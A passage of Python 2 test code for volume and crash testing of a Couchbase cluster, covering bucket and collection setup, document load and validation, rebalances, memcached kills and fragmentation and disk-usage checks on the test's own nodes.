{"name": self.scope_name})
if self.num_scopes > 1:
self.scope_prefix = self.input.param("scope_prefix",
"VolumeScope")
for bucket in self.cluster.buckets:
for i in range(self.num_scopes):
scope_name = self.scope_prefix + str(i)
self.log.info("Creating scope: %s"
% (scope_name))
self.bucket_util.create_scope(self.cluster.master,
bucket,
{"name": scope_name})
self.sleep(0.5)
self.num_scopes += 1
for bucket in self.cluster.buckets:
for scope in bucket.scopes.keys():
if self.num_collections >= 1:
self.collection_prefix = self.input.param("collection_prefix",
"VolumeCollection")
for i in range(self.num_collections):
collection_name = self.collection_prefix + str(i)
self.bucket_util.create_collection(self.cluster.master,
bucket,
scope,
{"name": collection_name})
self.sleep(0.5)
# self.num_collections += 1
self.rest = RestConnection(self.cluster.master)
self.assertTrue(self.rest.update_autofailover_settings(False, 600),
"AutoFailover disabling failed")
if self.sdk_client_pool:
max_clients = min(self.task_manager.number_of_threads,
20)
clients_per_bucket = int(ceil(max_clients / self.num_buckets))
for bucket in self.cluster.buckets:
self.sdk_client_pool.create_clients(
bucket,
[self.cluster.master],
clients_per_bucket,
compression_settings=self.sdk_compression)
self.retry_exceptions = None
self.ignore_exceptions = None
self.key_type = self.input.param("key_type", "SimpleKey")
self.ops_rate = self.input.param("ops_rate", 10000)
def tearDown(self):
self.check_dump_thread = False
self.stop_crash = True
BaseTestCase.tearDown(self)
def get_memory_footprint(self):
out = subprocess.Popen(['ps', 'v', '-p', str(os.getpid())],stdout=subprocess.PIPE).communicate()[0].split(b'\n')
vsz_index = out[0].split().index(b'RSS')
mem = float(out[1].split()[vsz_index]) / 1024
self.PrintStep("RAM FootPrint: %s" % str(mem))
return mem
def create_required_buckets(self):
self.log.info("Get the available memory quota")
self.info = self.rest.get_nodes_self()
# threshold_memory_vagrant = 100
kv_memory = self.info.memoryQuota - 100
# Creating buckets for data loading purpose
self.log.info("Create CB buckets")
self.bucket_expiry = self.input.param("bucket_expiry", 0)
ramQuota = self.input.param("ramQuota", kv_memory)
buckets = ["GleamBookUsers"]*self.num_buckets
self.bucket_type = self.bucket_type.split(';')*self.num_buckets
self.compression_mode = self.compression_mode.split(';')*self.num_buckets
self.bucket_eviction_policy = self.bucket_eviction_policy
for i in range(self.num_buckets):
bucket = Bucket(
{Bucket.name: buckets[i] + str(i),
Bucket.ramQuotaMB: ramQuota/self.num_buckets,
Bucket.maxTTL: self.bucket_expiry,
Bucket.replicaNumber: self.num_replicas,
Bucket.storageBackend: self.bucket_storage,
Bucket.evictionPolicy: self.bucket_eviction_policy,
Bucket.bucketType: self.bucket_type[i],
Bucket.flushEnabled: Bucket.FlushBucket.ENABLED,
Bucket.compressionMode: self.compression_mode[i],
Bucket.fragmentationPercentage: self.fragmentation})
self.bucket_util.create_bucket(self.cluster, bucket)
# rebalance the new buckets across all nodes.
self.log.info("Rebalance Starts")
self.nodes = self.rest.node_statuses()
self.rest.rebalance(otpNodes=[node.id for node in self.nodes],
ejectedNodes=[])
self.rest.monitorRebalance()
def set_num_writer_and_reader_threads(self, num_writer_threads="default",
num_reader_threads="default"):
for node in self.cluster_util.get_kv_nodes(self.cluster):
bucket_helper = BucketHelper(node)
bucket_helper.update_memcached_settings(
num_writer_threads=num_writer_threads,
num_reader_threads=num_reader_threads)
def generate_docs(self, doc_ops=None,
create_end=None, create_start=None,
update_end=None, update_start=None,
delete_end=None, delete_start=None,
expire_end=None, expire_start=None,
read_end=None, read_start=None):
self.get_memory_footprint()
self.create_end = 0
self.create_start = 0
self.read_end = 0
self.read_start = 0
self.update_end = 0
self.update_start = 0
self.delete_end = 0
self.delete_start = 0
self.expire_end = 0
self.expire_start = 0
self.initial_items = self.final_items
doc_ops = doc_ops or self.doc_ops
self.mutations_to_validate = doc_ops
if "read" in doc_ops:
if read_start is not None:
self.read_start = read_start
else:
self.read_start = 0
if read_end is not None:
self.read_end = read_end
else:
self.read_end = self.num_items * self.mutation_perc/100
if "update" in doc_ops:
if update_start is not None:
self.update_start = update_start
else:
self.update_start = 0
if update_end is not None:
self.update_end = update_end
else:
self.update_end = self.num_items * self.mutation_perc/100
self.mutate += 1
if "delete" in doc_ops:
if delete_start is not None:
self.delete_start = delete_start
else:
self.delete_start = self.start
if delete_end is not None:
self.delete_end = delete_end
else:
self.delete_end = self.start + self.num_items * self.mutation_perc/100
self.final_items -= (self.delete_end - self.delete_start) * self.num_collections * self.num_scopes
if "expiry" in doc_ops:
if self.maxttl == 0:
self.maxttl = self.input.param("maxttl", 10)
if expire_start is not None:
self.expire_start = expire_start
else:
self.expire_start = self.delete_end
if expire_end is not None:
self.expire_end = expire_end
else:
self.expire_end = self.expiry_start + self.num_items * self.mutation_perc/100
self.final_items -= (self.expire_end - self.expire_start) * self.num_collections * self.num_scopes
if "create" in doc_ops:
if create_start is not None:
self.create_start = create_start
else:
self.create_start = self.end
self.start = self.create_start
if create_end is not None:
self.create_end = create_end
else:
self.create_end = self.end + (self.expire_end - self.expire_start) + (self.delete_end - self.delete_start)
self.end = self.create_end
self.final_items += (abs(self.create_end - self.create_start)) * self.num_collections * self.num_scopes
print "Read Start: %s" % self.read_start
print "Read End: %s" % self.read_end
print "Update Start: %s" % self.update_start
print "Update End: %s" % self.update_end
print "Delete Start: %s" % self.delete_start
print "Delete End: %s" % self.delete_end
print "Expiry End: %s" % self.expire_start
print "Expiry End: %s" % self.expire_end
print "Create Start: %s" % self.create_start
print "Create End: %s" % self.create_end
print "Final Start: %s" % self.start
print "Final End: %s" % self.end
def data_load(self, cmd=dict()):
self.ops_rate = self.input.param("ops_rate", 2000)
master = Server(self.cluster.master.ip, self.cluster.master.port,
self.cluster.master.rest_username, self.cluster.master.rest_password,
str(self.cluster.master.memcached_port))
self.tm = TaskManager(self.process_concurrency)
self.loader_map = dict()
for bucket in self.cluster.buckets:
for scope in bucket.scopes.keys():
for collection in bucket.scopes[scope].collections.keys():
if collection == "_default" and scope == "_default":
continue
ws = WorkLoadSettings(cmd.get("keyPrefix", self.key),
cmd.get("keySize", self.key_size),
cmd.get("docSize", self.doc_size),
cmd.get("cr", self.create_perc),
cmd.get("rd", self.read_perc),
cmd.get("up", self.update_perc),
cmd.get("dl", self.delete_perc),
cmd.get("ex", self.expiry_perc),
cmd.get("workers", self.process_concurrency),
cmd.get("ops", self.ops_rate),
cmd.get("loadType", None),
cmd.get("keyType", None),
cmd.get("valueType", None),
cmd.get("validate", False),
cmd.get("gtm", False),
cmd.get("deleted", False),
cmd.get("mutated", 0)
)
hm = HashMap()
hm.putAll({DRConstants.create_s: self.create_start,
DRConstants.create_e: self.create_end,
DRConstants.update_s: self.update_start,
DRConstants.update_e: self.update_end,
DRConstants.expiry_s: self.expire_start,
DRConstants.expiry_e: self.expire_end,
DRConstants.delete_s: self.delete_start,
DRConstants.delete_e: self.delete_end,
DRConstants.read_s: self.read_start,
DRConstants.read_e: self.read_end})
dr = DocRange(hm)
ws.dr = dr
dg = DocumentGenerator(ws, self.key_type, None)
self.loader_map.update({bucket.name+scope+collection: dg})
tasks = list()
i = self.process_concurrency
while i > 0:
for bucket in self.cluster.buckets:
for scope in bucket.scopes.keys():
for collection in bucket.scopes[scope].collections.keys():
if collection == "_default" and scope == "_default":
continue
client = NewSDKClient(master, bucket.name, scope, collection)
client.initialiseSDK()
self.sleep(1)
taskName = "Loader_%s_%s_%s_%s_%s" % (bucket.name, scope, collection, str(i), time.time())
task = WorkLoadGenerate(taskName, self.loader_map[bucket.name+scope+collection],
client, self.durability_level,
self.maxttl, self.time_unit,
self.track_failures, 0)
tasks.append(task)
self.tm.submit(task)
i -= 1
return tasks
def wait_for_doc_load_completion(self, tasks, wait_for_stats=True):
self.tm.getAllTaskResult()
for task in tasks:
task.result = True
for optype, failures in task.failedMutations.items():
for failure in failures:
print("Test Retrying {}: {} -> {}".format(optype, failure.id(), failure.err().getClass().getSimpleName()))
if optype == "create":
try:
task.docops.insert(failure.id(), failure.document(), task.sdk.connection, task.setOptions);
# task.failedMutations.get(optype).remove(failure)
except (ServerOutOfMemoryException, TimeoutException) as e:
print("Retry Create failed for key: " + failure.id())
task.result = False
except DocumentExistsException as e:
pass
if optype == "update":
try:
task.docops.upsert(failure.id(), failure.document(), task.sdk.connection, task.upsertOptions);
# task.failedMutations.get(optype).remove(failure)
except (ServerOutOfMemoryException, TimeoutException) as e:
print("Retry update failed for key: " + failure.id())
task.result = False
except DocumentExistsException as e:
pass
if optype == "delete":
try:
task.docops.delete(failure.id(), task.sdk.connection, task.removeOptions);
# task.failedMutations.get(optype).remove(failure)
except (ServerOutOfMemoryException, TimeoutException) as e:
print("Retry delete failed for key: " + failure.id())
task.result = False
except DocumentNotFoundException as e:
pass
try:
task.sdk.disconnectCluster()
except Exception as e:
print(e)
self.assertTrue(task.result, "Task Failed: {}".format(task.taskName))
if wait_for_stats:
try:
self.bucket_util._wait_for_stats_all_buckets(
self.cluster, self.cluster.buckets, timeout=1200)
self.bucket_util.verify_stats_all_buckets(self.cluster, self.final_items)
except Exception as e:
self.get_gdb()
raise e
def get_gdb(self):
for node in self.cluster.nodes_in_cluster:
gdb_shell = RemoteMachineShellConnection(node)
gdb_out = gdb_shell.execute_command('gdb -p `(pidof memcached)` -ex "thread apply all bt" -ex detach -ex quit')[0]
self.log.critical("GDB bt logs from node: %s\n %s"
% (node.ip, gdb_out))
gdb_shell.disconnect()
def data_validation(self):
doc_ops = self.mutations_to_validate
if self._data_validation:
self.log.info("Validating Active/Replica Docs")
cmd = dict()
self.ops_rate = self.input.param("ops_rate", 2000)
master = Server(self.cluster.master.ip, self.cluster.master.port,
self.cluster.master.rest_username, self.cluster.master.rest_password,
str(self.cluster.master.memcached_port))
self.tm = TaskManager(self.process_concurrency)
self.loader_map = dict()
for bucket in self.cluster.buckets:
for scope in bucket.scopes.keys():
for collection in bucket.scopes[scope].collections.keys():
if collection == "_default" and scope == "_default":
continue
for op_type in doc_ops:
cmd.update({"deleted": False})
hm = HashMap()
if op_type == "create":
hm.putAll({DRConstants.read_s: self.create_start,
DRConstants.read_e: self.create_end})
elif op_type == "update":
hm.putAll({DRConstants.read_s: self.update_start,
DRConstants.read_e: self.update_end})
elif op_type == "delete":
hm.putAll({DRConstants.read_s: self.delete_start,
DRConstants.read_e: self.delete_end})
cmd.update({"deleted": True})
else:
continue
dr = DocRange(hm)
ws = WorkLoadSettings(cmd.get("keyPrefix", self.key),
cmd.get("keySize", self.key_size),
cmd.get("docSize", self.doc_size),
cmd.get("cr", 0),
cmd.get("rd", 100),
cmd.get("up", 0),
cmd.get("dl", 0),
cmd.get("ex", 0),
cmd.get("workers", self.process_concurrency),
cmd.get("ops", self.ops_rate),
cmd.get("loadType", None),
cmd.get("keyType", None),
cmd.get("valueType", None),
cmd.get("validate", True),
cmd.get("gtm", False),
cmd.get("deleted", False),
cmd.get("mutated", 0))
ws.dr = dr
dg = DocumentGenerator(ws, self.key_type, None)
self.loader_map.update({bucket.name+scope+collection+op_type: dg})
tasks = list()
i = self.process_concurrency
while i > 0:
for bucket in self.cluster.buckets:
for scope in bucket.scopes.keys():
for collection in bucket.scopes[scope].collections.keys():
if collection == "_default" and scope == "_default":
continue
for op_type in doc_ops:
if op_type not in ["create", "update", "delete"]:
continue
client = NewSDKClient(master, bucket.name, scope, collection)
client.initialiseSDK()
self.sleep(1)
taskName = "Validate_%s_%s_%s_%s_%s_%s" % (bucket.name, scope, collection, op_type, str(i), time.time())
task = WorkLoadGenerate(taskName, self.loader_map[bucket.name+scope+collection+op_type],
client, "NONE",
self.maxttl, self.time_unit,
self.track_failures, 0)
tasks.append(task)
self.tm.submit(task)
i -= 1
self.tm.getAllTaskResult()
for task in tasks:
try:
task.sdk.disconnectCluster()
except Exception as e:
print(e)
for task in tasks:
self.assertTrue(task.result, "Validation Failed for: %s" % task.taskName)
def get_bucket_dgm(self, bucket):
self.rest_client = BucketHelper(self.cluster.master)
count = 0
dgm = 100
while count < 5:
try:
dgm = self.rest_client.fetch_bucket_stats(
bucket.name)["op"]["samples"]["vb_active_resident_items_ratio"][-1]
self.log.info("Active Resident Threshold of {0} is {1}".format(
bucket.name, dgm))
return dgm
except Exception as e:
self.sleep(5, e)
count += 1
return dgm
def _induce_error(self, error_condition, nodes=[]):
nodes = nodes or [self.cluster.master]
for node in nodes:
if error_condition == "stop_server":
self.cluster_util.stop_server(self.cluster, node)
elif error_condition == "enable_firewall":
self.cluster_util.start_firewall_on_node(self.cluster, node)
elif error_condition == "kill_memcached":
self.cluster_util.kill_memcached(self.cluster, node=node)
elif error_condition == "reboot_server":
shell = RemoteMachineShellConnection(node)
shell.reboot_node()
elif error_condition == "kill_erlang":
shell = RemoteMachineShellConnection(node)
shell.kill_erlang()
self.sleep(self.sleep_time * 3)
shell.disconnect()
else:
self.fail("Invalid error induce option")
def _recover_from_error(self, error_condition):
for node in self.cluster.nodes_in_cluster:
if error_condition == "stop_server" or error_condition == "kill_erlang":
self.cluster_util.start_server(self.cluster, node)
elif error_condition == "enable_firewall":
self.cluster_util.stop_firewall_on_node(self.cluster, node)
for node in self.cluster.nodes_in_cluster:
result = self.cluster_util.wait_for_ns_servers_or_assert([node],
wait_time=1200)
self.assertTrue(result, "Server warmup failed")
self.check_warmup_complete(node)
def rebalance(self, nodes_in=0, nodes_out=0,
retry_get_process_num=3000):
self.servs_in = random.sample(self.available_servers, nodes_in)
self.nodes_cluster = self.cluster.nodes_in_cluster[:]
self.nodes_cluster.remove(self.cluster.master)
self.servs_out = random.sample(self.nodes_cluster, nodes_out)
if nodes_in == nodes_out:
self.vbucket_check = False
rebalance_task = self.task.async_rebalance(
self.cluster.servers[:self.nodes_init],
self.servs_in, self.servs_out,
check_vbucket_shuffling=self.vbucket_check,
retry_get_process_num=retry_get_process_num)
self.available_servers = [servs for servs in self.available_servers
if servs not in self.servs_in]
self.available_servers += self.servs_out
self.cluster.nodes_in_cluster.extend(self.servs_in)
self.cluster.nodes_in_cluster = list(set(self.cluster.nodes_in_cluster)
- set(self.servs_out))
return rebalance_task
def print_crud_stats(self):
self.table = TableView(self.log.info)
self.table.set_headers(["Initial Items",
"Current Items",
"Items Updated",
"Items Created",
"Items Deleted",
"Items Expired"])
self.table.add_row([
str(self.initial_items),
str(self.final_items),
str(abs(self.update_start)) + "-" + str(abs(self.update_end)),
str(abs(self.create_start)) + "-" + str(abs(self.create_end)),
str(abs(self.delete_start)) + "-" + str(abs(self.delete_end)),
str(abs(self.expire_start)) + "-" + str(abs(self.expire_end))
])
self.table.display("Docs statistics")
def perform_load(self, crash=False, num_kills=1, wait_for_load=True,
validate_data=True):
task = self.data_load()
if wait_for_load:
self.wait_for_doc_load_completion(task)
else:
return task
if crash:
self.kill_memcached(num_kills=num_kills)
if validate_data:
self.data_validation()
self.print_stats()
result = self.check_coredump_exist(self.cluster.nodes_in_cluster)
if result:
self.PrintStep("CRASH | CRITICAL | WARN messages found in cb_logs")
if self.assert_crashes_on_load:
self.task.jython_task_manager.abort_all_tasks()
self.assertFalse(result)
def print_stats(self):
self.bucket_util.print_bucket_stats(self.cluster)
self.print_crud_stats()
for bucket in self.cluster.buckets:
self.get_bucket_dgm(bucket)
if bucket.storageBackend == Bucket.StorageBackend.magma:
self.get_magma_disk_usage(bucket)
self.check_fragmentation_using_magma_stats(bucket)
self.check_fragmentation_using_kv_stats(bucket)
def check_fragmentation_using_kv_stats(self, bucket, servers=None):
result = dict()
if servers is None:
servers = self.cluster.nodes_in_cluster
if type(servers) is not list:
servers = [servers]
for server in servers:
frag_val = self.bucket_util.get_fragmentation_kv(
self.cluster, bucket, server)
self.log.debug("Current Fragmentation for node {} is {} \
".format(server.ip, frag_val))
result.update({server.ip: frag_val})
self.log.info("KV stats fragmentation values {}".format(result))
def check_fragmentation_using_magma_stats(self, bucket, servers=None):
result = dict()
stats = list()
if servers is None:
servers = self.cluster.nodes_in_cluster
if type(servers) is not list:
servers = [servers]
for server in servers:
fragmentation_values = list()
shell = RemoteMachineShellConnection(server)
output = shell.execute_command(
"lscpu | grep 'CPU(s)' | head -1 | awk '{print $2}'"
)[0][0].split('\n')[0]
self.log.debug("machine: {} - core(s): {}".format(server.ip,
output))
for i in range(min(int(output), 64)):
grep_field = "rw_{}:magma".format(i)
_res = self.get_magma_stats(bucket, shell,
field_to_grep=grep_field)
fragmentation_values.append(float(_res[server.ip][grep_field]
["Fragmentation"]))
stats.append(_res)
result.update({server.ip: fragmentation_values})
shell.disconnect()
res = list()
for value in result.values():
res.append(max(value))
if max(res) < float(self.fragmentation)/100:
self.log.info("magma stats fragmentation result {} \
".format(result))
return True
self.log.info("magma stats fragmentation result {} \
".format(result))
self.log.info(stats)
return False
def get_magma_stats(self, bucket, shell=None, field_to_grep=None):
magma_stats_for_all_servers = dict()
cbstat_obj = Cbstats(shell)
result = cbstat_obj.magma_stats(bucket.name,
field_to_grep=field_to_grep)
magma_stats_for_all_servers[shell.ip] = result
return magma_stats_for_all_servers
def get_magma_disk_usage(self, bucket=None):
if bucket is None:
bucket = self.bucket
servers = self.cluster.nodes_in_cluster
kvstore = 0
wal = 0
keyTree = 0
seqTree = 0
data_files = 0
for server in servers:
shell = RemoteMachineShellConnection(server)
bucket_path = os.path.join(RestConnection(server).get_data_path(),bucket.name)
kvstore += int(shell.execute_command("du -cm %s | tail -1 | awk '{print $1}'\
" % os.path.join(bucket_path, "magma.*/kv*"))[0][0].split('\n')[0])
wal += int(shell.execute_command("du -cm %s | tail -1 | awk '{print $1}'\
" % os.path.join(bucket_path, "magma.*/wal"))[0][0].split('\n')[0])
keyTree += int(shell.execute_command("du -cm %s | tail -1 | awk '{print $1}'\
" % os.path.join(bucket_path, "magma.*/kv*/rev*/key*"))[0][0].split('\n')[0])
seqTree += int(shell.execute_command("du -cm %s | tail -1 | awk '{print $1}'\
" % os.path.join(bucket_path, "magma.*/kv*/rev*/seq*"))[0][0].split('\n')[0])
cmd = 'find ' + bucket_path + '/magma*/ -maxdepth 1 -type d \
-print0 | while read -d "" -r dir; do files=("$dir"/*/*/*); \
printf "%d,%s\n" "${#files[@]}" "$dir"; done'
data_files = shell.execute_command(cmd)[0]
for files in data_files:
if "kvstore" in files and int(files.split(",")[0]) >= 300:
self.log.warn("Number of files in {}--{} is {}".format(
server.ip, files.split(",")[1].rstrip(), files.split(",")[0]))
shell.disconnect()
self.log.debug("Total Disk usage for kvstore is {}MB".format(kvstore))
self.log.debug("Total Disk usage for wal is {}MB".format(wal))
self.log.debug("Total Disk usage for keyTree is {}MB".format(keyTree))
self.log.debug("Total Disk usage for seqTree is {}MB".format(seqTree))
return kvstore, wal, keyTree, seqTree
def crash_thread(self, nodes=None, num_kills=1, graceful=False):
self.stop_crash = False
self.crash_count = 0
if not nodes:
nodes = self.cluster.nodes_in_cluster
while not self.stop_crash:
self.get_memory_footprint()
sleep = random.randint(60, 120)
self.sleep(sleep,
"Iteration:{} waiting to kill memc on all nodes".
format(self.crash_count))
self.kill_memcached(nodes, num_kills=num_kills,
graceful=graceful, wait=True)
self.crash_count += 1
if self.crash_count > self.crashes:
self.stop_crash = True
self.sleep(300)
def kill_memcached(self, servers=None, num_kills=1,
graceful=False, wait=True):
if not servers:
servers = self.cluster.nodes_in_cluster
for _ in xrange(num_kills):
self.sleep(5, "Sleep for 5 seconds between continuous memc kill")
for server in servers:
shell = RemoteMachineShellConnection(server)
if graceful:
shell.restart_couchbase()
else:
shell.kill_memcached()
shell.disconnect()
result = self.check_coredump_exist(self.cluster.nodes_in_cluster)
if result:
self.stop_crash = True
self.task.jython_task_manager.abort_all_tasks()
self.assertFalse(
result,
"CRASH | CRITICAL | WARN messages found in cb_logs")
if wait:
for server in servers:
self.check_warmup_complete(server)
def check_dump(self):
count = 1
shells = list()
for server in self.cluster.nodes_in_cluster:
shells.append(RemoteMachineShellConnection(server))
while self.check_dump_thread:
self.log.debug("Checking crashes {}".format(count))
result = self.check_coredump_exist(self.cluster.nodes_in_cluster)
if result:
self.stop_crash = True
self.check_dump_thread = False
self.task.jython_task_manager.abort_all_tasks()
self.assertFalse(
result,
"CRASH | CRITICAL | WARN messages found in cb_logs")
for shell in shells:
for bucket in self.cluster.buckets:
output = shell.execute_command(
'/opt/couchbase/bin/cbstats localhost:11210 memory \
-u Administrator -p password -b {} | grep -e \
ep_arena:resident -e ep_arena:allocated \
-e mem_used:'.format(bucket.name))[0]
self.log.debug("{}: {}".format(shell.ip,
output[0].replace(" ", "")
.strip()))
self.log.debug("{}: {}".format(shell.ip,
output[1].replace(" ", "")
.strip()))
self.log.debug("{}: {}".format(shell.ip,
output[2].replace(" ", "")
.strip()))
self.sleep(60)
count += 1
for shell in shells:
shell.disconnect()
def check_warmup_complete(self, server):
for bucket in self.cluster.buckets:
start_time = time.time()
result = self.bucket_util._wait_warmup_completed(
[server],
self.cluster.buckets[0],
wait_time=self.wait_timeout * 20)
if not result:
self.stop_crash = True
self.task.jython_task_manager.abort_all_tasks()
self.assertTrue(result, "Warm-up failed in %s seconds"
% (self.wait_timeout * 20))
else:
self.log.info("Bucket:%s warm-up completed in %s." %
(bucket.name, str(time.time() - start_time)))
def perform_rollback(self, start=None, mem_only_items=100000,
doc_type="create", kill_rollback=1):
if not self.rollback:
return
rollbacks = self.input.param("rollbacks", 2)
# mem_only_items = random.randint(mem_only_items, mem_only_items*2)
_iter = 0
self.gen_create, self.gen_update, self.gen_delete, self.gen_expiry = [None]*4
while _iter < rollbacks:
self.PrintStep("Rollback with %s: %s" % (doc_type,
str(_iter)))
tasks_info = dict()
node = self.cluster.nodes_in_cluster[0]
# Stopping persistence on NodeA
mem_client = MemcachedClientHelper.direct_client(
node, self.cluster.buckets[0])
mem_client.stop_persistence()
shell = RemoteMachineShellConnection(node)
cbstats = Cbstats(shell)
target_vbucket = cbstats.vbucket_list(self.cluster.buckets[0].
name)
shell.disconnect()
gen_docs = doc_generator(
self.key_prefix,
start, mem_only_items,
doc_size=self.doc_size,
doc_type=self.doc_type,
target_vbucket=target_vbucket,
vbuckets=self.cluster.vbuckets,
key_size=self.key_size,
randomize_doc_size=self.randomize_doc_size,
randomize_value=self.randomize_value,
mix_key_size=self.mix_key_size)
if doc_type == "create":
self.gen_create = gen_docs
if doc_type == "update":
self.gen_update = gen_docs
if doc_type == "delete":
self.gen_delete = gen_docs
if doc_type == "expiry":
self.gen_expiry = gen_docs
if self.maxttl == 0:
self.maxttl = self.input.param("maxttl", 10)
doc_type = "update"
task = self.perform_load(wait_for_load=False)
self.wait_for_doc_load_completion(task, wait_for_stats=False)
ep_queue_size_map = {node: mem_only_items *
self.num_scopes *
self.num_collections}
vb_replica_queue_size_map = {node: 0}
for server in self.cluster.nodes_in_cluster:
if server.ip != node.ip:
ep_queue_size_map.update({server: 0})
vb_replica_queue_size_map.update({server: 0})
for bucket in self.cluster.buckets:
self.bucket_util._wait_for_stat(bucket, ep_queue_size_map,
timeout=3600)
self.bucket_util._wait_for_stat(
bucket,
vb_replica_queue_size_map,
stat_name="vb_replica_queue_size",
timeout=3600)
self.kill_memcached(num_kills=kill_rollback)
self.bucket_util.verify_stats_all_buckets(self.cluster,
self.final_items,
timeout=3600)
self.print_stats()
_iter += 1
def pause_rebalance(self):
rest = RestConnection(self.cluster.master)
i = 1
self.sleep(10, "Let the rebalance begin!")
expected_progress = 20
while expected_progress < 100:
expected_progress = 20 * i
reached = RestHelper(rest).rebalance_reached(expected_progress)
self.assertTrue(reached, "Rebalance failed or did not reach {0}%"
.format(expected_progress))
if not RestHelper(rest).is_cluster_rebalanced():
self.log.info("Stop the rebalance")
stopped = rest.stop_rebalance(wait_timeout=self.wait_timeout / 3)
self.assertTrue(stopped, msg="Unable to stop rebalance")
rebalance_task = self.task.async_rebalance(self.cluster.nodes_in_cluster,
[], [],
retry_get_process_num=3000)
self.sleep(10, "Rebalance % ={}. Let the rebalance begin!".
format(expected_progress))
i += 1
return rebalance_task
def abort_rebalance(self, rebalance, error_type="kill_memcached"):
self.sleep(30, "Let the rebalance begin!")
rest = RestConnection(self.cluster.master)
i = 1
expected_progress = 20
rebalance_task = rebalance
while expected_progress < 80:
expected_progress = 20 * i
reached = RestHelper(rest).rebalance_reached(expected_progress,
wait_step=10)
self.assertTrue(reached, "Rebalance failed or did not reach {0}%"
.format(expected_progress))
if not RestHelper(rest).is_cluster_rebalanced():
self.log.info("Abort rebalance")
self._induce_error(error_type)
result = self.check_coredump_exist(self.cluster.nodes_in_cluster)
if result:
self.task.jython_task_manager.abort_all_tasks()
self.assertFalse(
result,
"CRASH | CRITICAL | WARN messages found in cb_logs")
self.sleep(60, "Sleep after error introduction")
self._recover_from_error(error_type)
result = self.check_coredump_exist(self.cluster.nodes_in_cluster)
if result:
self.task.jython_task_manager.abort_all_tasks()
self.assertFalse(
result,
"CRASH | CRITICAL | WARN messages found in cb_logs")
try:
self.task.jython_task_manager.get_task_result(rebalance_task)
except RebalanceFailedException:
pass
if rebalance.result:
self.log.error("Rebalance passed/finished which is not expected")
self.log.info("Rebalance % after rebalance finished = {}".
format(expected_progress))
break
else:
self.log.info("Restarting Rebalance after killing at {}".
format(expected_progress))
rebalance_task = self.task.async_rebalance(
self.cluster.nodes_in_cluster, [], self.servs_out,
retry_get_process_num=3000)
self.sleep(120, "Let the rebalance begin after abort")
self.log.info("Rebalance % = {}".
format(self.rest._rebalance_progress()))
i += 1
return rebalance_task
def PrintStep(self, msg=None):
print("\n")
print("#"*60)
print("#")
print("# %s" % msg)
print("#")
print("#"*60)
print("\n")
def ClusterOpsVolume(self):
#######################################################################
def end_step_checks(tasks):
self.wait_for_doc_load_completion(tasks)
self.data_validation()
self.print_stats()
result = self.check_coredump_exist(self.cluster.nodes_in_cluster)
if result:
self.stop_crash = True
self.task.jython_task_manager.abort_all_tasks()
self.assertFalse(
result,
"CRASH | CRITICAL | WARN messages found in cb_logs")
self.loop = 0
while self.loop < self.iterations:
'''
Create sequential: 0 - 10M
Final Docs = 10M (0-10M, 10M seq items)
'''
self.create_perc = 100
self.PrintStep("Step 3: Create %s items sequentially" % self.num_items)
self.generate_docs(doc_ops=["create"],
create_start=self.start, create_end=self.num_items)
self.perform_load(validate_data=False)
self.PrintStep("Step 3.1: Update %s RandonKey keys to create 50 percent fragmentation" % str(self.num_items))
self.generate_docs(doc_ops=["update"],
update_start=self.start, update_end=self.end)
self.perform_load(validate_data=False)
###################################################################
'''
Existing:
Sequential: 0 - 10M
This Step:
Create Random: 0 - 20M
Final Docs = 30M (0-20M, 20M Random)
Nodes In Cluster = 3
'''
self.PrintStep("Step 4: Create %s random keys" % str(self.num_items))
self.generate_docs(doc_ops=["create"],
create_start=self.end, create_end=self.end+self.num_items)
self.perform_load(validate_data=False)
###################################################################
'''
Existing:
Sequential: 0 - 10M
Random: 0 - 20M
This Step:
Update Sequential: 0 - 10M
Update Random: 0 - 20M to create 50% fragmentation
Final Docs = 30M (0-20M, 20M Random)
Nodes In Cluster = 3
'''
self.update_perc = 100
self.PrintStep("Step 5: Update %s random keys to create 50 percent fragmentation" % str(self.num_items))
self.generate_docs(doc_ops=["update"],
update_start=self.start, update_end=self.end)
self.perform_load(validate_data=False)
self.mutation_perc = self.input.param("mutation_perc", 100)
###################################################################
'''
Existing:
Sequential: 0 - 10M
Random: 0 - 20M
This Step:
Create Random: 20 - 30M
Delete Random: 10 - 20M
Update Random: 0 - 10M
Nodes In Cluster = 3 -> 4
Final Docs = 30M (Random: 0-10M, 20-30M, Sequential: 0-10M)
Nodes In Cluster = 4
'''
self.create_perc = 25
self.update_perc = 25
self.delete_perc = 25
self.expiry_perc = 25
self.read_perc = 25
self.PrintStep("Step 6: Rebalance in with Loading of docs")
rebalance_task = self.rebalance(nodes_in=1, nodes_out=0)
self.generate_docs(doc_ops=["update", "delete", "read", "create"])
tasks = self.perform_load(wait_for_load=False)
self.task.jython_task_manager.get_task_result(rebalance_task)
self.assertTrue(rebalance_task.result, "Rebalance Failed")
end_step_checks(tasks)
###################################################################
'''
Existing:
Sequential: 0 - 10M
Random: 0 - 10M, 20 - 30M
This Step:
Create Random: 30 - 40M
Delete Random: 20 - 30M
Update Random: 0 - 10M
Nodes In Cluster = 4 -> 3
Final Docs = 30M (Random: 0-10M, 30-40M, Sequential: 0-10M)
Nodes In Cluster = 3
'''
self.PrintStep("Step 7: Rebalance Out with Loading of docs")
rebalance_task = self.rebalance(nodes_in=0, nodes_out=1)
self.generate_docs(doc_ops=["update", "delete", "read", "create"])
tasks = self.perform_load(wait_for_load=False)
self.task.jython_task_manager.get_task_result(rebalance_task)
self.assertTrue(rebalance_task.result, "Rebalance Failed")
end_step_checks(tasks)
###################################################################
'''
Existing:
Sequential: 0 - 10M
Random: 0 - 10M, 30 - 40M
This Step:
Create Random: 40 - 50M
Delete Random: 30 - 40M
Update Random: 0 - 10M
Nodes In Cluster = 3 -> 4
Final Docs = 30M (Random: 0-10M, 40-50M, Sequential: 0-10M)
Nodes In Cluster = 4
'''
self.PrintStep("Step 8: Rebalance In_Out with Loading of docs")
rebalance_task = self.rebalance(nodes_in=2, nodes_out=1)
self.generate_docs(doc_ops=["update", "delete", "read", "create"])
tasks = self.perform_load(wait_for_load=False)
self.task.jython_task_manager.get_task_result(rebalance_task)
self.assertTrue(rebalance_task.result, "Rebalance Failed")
end_step_checks(tasks)
###################################################################
'''
Existing:
Sequential: 0 - 10M
Random: 0 - 10M, 40 - 50M
This Step:
Create Random: 50 - 60M
Delete Random: 40 - 50M
Update Random: 0 - 10M
Nodes In Cluster = 4 -> 4 (SWAP)
Final Docs = 30M (Random: 0-10M, 50-60M, Sequential: 0-10M)
Nodes In Cluster = 4
'''
self.PrintStep("Step 9: Swap with Loading of docs")
rebalance_task = self.rebalance(nodes_in=1, nodes_out=1)
self.generate_docs(doc_ops=["update", "delete", "read", "create"])
